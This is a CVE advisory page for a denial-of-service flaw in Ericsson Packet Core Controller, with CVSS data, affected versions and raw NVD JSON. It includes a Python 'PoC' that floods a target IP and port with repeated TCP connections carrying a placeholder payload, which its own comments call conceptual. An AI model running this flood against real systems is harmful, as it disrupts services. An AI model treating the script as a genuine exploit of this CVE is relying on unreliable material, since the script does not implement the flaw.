Security Vulnerability Report
中文
CVE-2024-53828 CVSS 5.3 MEDIUM

CVE-2024-53828

Published: 2026-04-01 10:16:14
Last Modified: 2026-04-10 15:44:46
Source: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

Description

Ericsson Packet Core Controller (PCC) versions prior to 1.38 contain a vulnerability where an attacker sending a large volume of specially crafted messages may cause service degradation.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ericsson:packet_core_controller:*:*:*:*:*:*:*:* - VULNERABLE
Ericsson Packet Core Controller (PCC) < 1.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import time # Conceptual Proof of Concept for CVE-2024-53828 # This script simulates sending crafted messages to cause service degradation. # Note: Actual protocol details depend on Ericsson PCC implementation. def send_flood(target_ip, target_port, count): """ Sends a large volume of crafted messages to the target. """ # Example crafted payload (hex representation) # This is a placeholder; real exploitation requires specific protocol structure. crafted_message = b"\x00\x01\x02\x03\x04\x05" * 100 try: for i in range(count): # Create a socket (SOCK_STREAM or SOCK_DGRAM depending on protocol) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(2) try: s.connect((target_ip, target_port)) print(f"[+] Sending packet {i+1}/{count}") s.sendall(crafted_message) except Exception as e: print(f"[-] Error sending packet: {e}") finally: s.close() except KeyboardInterrupt: print("[!] Stopping attack.") if __name__ == "__main__": # Replace with actual target IP and Port TARGET_IP = "192.168.1.100" TARGET_PORT = 8080 PACKET_COUNT = 10000 print(f"[*] Starting flood on {TARGET_IP}:{TARGET_PORT}") send_flood(TARGET_IP, TARGET_PORT, PACKET_COUNT) print("[*] Flood completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-53828", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2026-04-01T10:16:14.190", "lastModified": "2026-04-10T15:44:45.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ericsson Packet Core Controller (PCC) versions prior\nto 1.38 contain a vulnerability where an attacker sending a large volume of\nspecially crafted messages may cause service degradation."}], "metrics": {"cvssMetricV31": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-228"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ericsson:packet_core_controller:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.38", "matchCriteriaId": "3E40F8A9-F3D7-490D-9839-11DBE8734AB2"}]}]}], "references": [{"url": "https://www.ericsson.com/en/about-us/security/psirt/CVE-2024-53828", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}]}}